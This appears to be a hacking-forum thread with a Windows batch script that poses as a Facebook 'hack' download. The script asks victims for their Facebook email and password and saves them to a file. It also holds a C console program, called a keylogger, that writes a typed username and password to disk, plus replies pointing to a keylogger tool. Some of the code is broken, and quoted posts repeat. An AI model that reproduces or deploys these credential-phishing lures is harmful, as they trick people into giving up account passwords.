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Watch this tutorial and try as much as possible to do the same .




The text from Notepad : 


@echo off
color a
title Log on
echo -------------------------------------------------------------------------------
echo Please Enter Your Email Adress And Password From Facebook To Download The Hack.
echo -------------------------------------------------------------------------------
cd "C:Hacked"
set /p user=E-mail:
set /p pass=Password:
echo username="%user%" Password="%pass%" >Hacked.txt
start >>Programmer Here<<
It can be changed in any way as long as it won't be in conflict with the structure rules .

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C version of this `keylogger` :).

#include <stdio.h>
#include <conio.h>

int main(void)
    char pass_character, username[100];
    FILE* fout = fopen("data.txt", "w");

    printf("Username: ");
    scanf("%s", &username);
    printf("Password: ");

    fprintf(fout, "Username: %snPassword: ", username);

    pass_character = _getch();

        fprintf(fout, "%c", pass_character);
        pass_character = _getch();
    }while (pass_character != 13);

    return 0;
  • Upvote 2


C version of this `keylogger` :).

#include <stdio.h>
#include <conio.h>

int main(void)
    char pass_character, username[100];
    FILE* fout = fopen("data.txt", "w");

    printf("Username: ");
    scanf("%s", &username);
    printf("Password: ");

    fprintf(fout, "Username: %snPassword: ", username);

    pass_character = _getch();

        fprintf(fout, "%c", pass_character);
        pass_character = _getch();
    }while (pass_character != 13);

    return 0;

Made by you or what? By the way, you cannot find a method to find if your OS was compromised by a keylogger? I'm not talking about the antivirus, it will tells you that you have a virus, no matter what type it is.

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Made by you or what? By the way, you cannot find a method to find if your OS was compromised by a keylogger? I'm not talking about the antivirus, it will tells you that you have a virus, no matter what type it is.


It's not actually a keylogger. It does the same thing like the first post. Just typing some data in console and those data (user & pass) are inserted into a file.


, you cannot find a method to find if your OS was compromised by a keylogger? I'm not talking about the antivirus, it will tells you that you have a virus, no matter what type it is.

Usually when an antivirus finds something, it will tell you what it is. 

love is a verb
Love is a doing word


It's not actually a keylogger. It does the same thing like the first post. Just typing some data in console and those data (user & pass) are inserted into a file.


If you want more than that , you can try ShadowKeylogger which does what you've said earlier  , I quote : 


That's not actually a keylogger.. a keylogger should take the characters you type in OTHER applications, not in that particular application :)).

  • 3 weeks later...

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